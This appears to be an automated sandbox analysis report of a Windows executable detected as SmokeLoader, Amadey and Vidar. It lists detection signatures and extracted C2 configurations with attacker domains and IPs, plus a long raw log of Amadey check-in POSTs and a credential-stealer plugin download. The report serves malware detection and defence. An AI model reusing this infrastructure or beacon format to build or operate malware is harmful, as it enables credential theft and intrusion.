Windows Analysis Report
kmxId0uLRn.exe

Overview

General Information

Sample Name: kmxId0uLRn.exe
Analysis ID: 766457
MD5: c8782da2928f63712d03d0ea36c57c3f
SHA1: 0d87ba5d17440501fe3629f56feb0a9193d43b43
SHA256: a68b2d14b767df5edb784bc338c84e09d73ac90a75346a9fedce2b0163ca9656
Tags: DofoilexeSmokeLoader
Infos:

Detection

Amadey, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Amadeys stealer DLL
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://62.204.41.79/fb73jc3/Plugins/cred64.dll Avira URL Cloud: Label: malware
Source: http://s2scomm20.com/ Avira URL Cloud: Label: malware
Source: http://c2csosi228d.com/ Avira URL Cloud: Label: malware
Source: http://31.41.244.228/fusa/bibar.exe Avira URL Cloud: Label: malware
Source: http://xdd42sdfsdf.com/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll Avira: detection malicious, Label: HEUR/AGEN.1233121
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Avira: detection malicious, Label: HEUR/AGEN.1253146
Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll Avira: detection malicious, Label: HEUR/AGEN.1233121
Source: C:\Users\user\AppData\Local\Temp\9545.exe Avira: detection malicious, Label: HEUR/AGEN.1253146
Multi AV Scanner detection for submitted file
Source: kmxId0uLRn.exe ReversingLabs: Detection: 69%
Source: kmxId0uLRn.exe Virustotal: Detection: 60% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\9545.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\thgcici ReversingLabs: Detection: 69%
Machine Learning detection for sample
Source: kmxId0uLRn.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9545.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\thgcici Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 12.0.8F68.exe.c42a60.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.8F68.exe.c42a60.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://s2scomm20.com/", "http://c2csosi228d.com/", "http://xdd42sdfsdf.com/"]}
Source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://t.me/ttruelive", "https://steamcommunity.com/profiles/76561199443972360"], "Botnet": "1808", "Version": "56.2"}
Source: 14.0.9545.exe.dd0000.3.unpack Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.79/fb73jc3/index.php", "Version": "3.60"}
Uses 32bit PE files
Source: kmxId0uLRn.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\kmxId0uLRn.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.98.131.207:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.159.19:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: Binary string: /C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 9545.exe, 0000000E.00000000.403314322.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000003.404330166.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000000.418195979.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 00000015.00000002.789042996.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000000.425079213.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000002.430617953.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000000.542142836.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000002.547939259.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe.14.dr, 9545.exe.1.dr
Source: Binary string: C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C2A284 FindFirstFileExW, 12_2_00C2A284
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DF1396 FindFirstFileExW, 14_2_00DF1396

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 31.41.244.228 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 62.204.41.79 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.168.2.3 80
Source: C:\Windows\explorer.exe Domain query: r3oidsofsios.com
Source: C:\Windows\explorer.exe Domain query: kikangalaassociates.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49699 -> 185.246.221.151:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49735 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49738 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49739 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49740 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49741 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49742 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49743 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49744 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49745 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49746 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49747 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49748 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49749 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49751 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49752 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49753 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49754 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49756 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49757 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49759 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49760 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49761 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49762 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49764 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49765 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49766 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49767 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49768 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49769 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49770 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49771 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49772 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49774 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49775 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49776 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49777 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49778 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49779 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49780 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49781 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49782 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49783 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49784 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49785 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49786 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49787 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49788 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49789 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49790 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49791 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49792 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49793 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49794 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49795 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49796 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49797 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49798 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49799 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49800 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49801 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49802 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49803 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49804 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49805 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49806 -> 62.204.41.79:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49807 -> 62.204.41.79:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 62.204.41.79/fb73jc3/index.php
Source: Malware configuration extractor URLs: http://s2scomm20.com/
Source: Malware configuration extractor URLs: http://c2csosi228d.com/
Source: Malware configuration extractor URLs: http://xdd42sdfsdf.com/
Source: Malware configuration extractor URLs: https://t.me/ttruelive
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199443972360
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODEyODY=Host: 62.204.41.79Content-Length: 81438Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: GET /fb73jc3/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.79
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
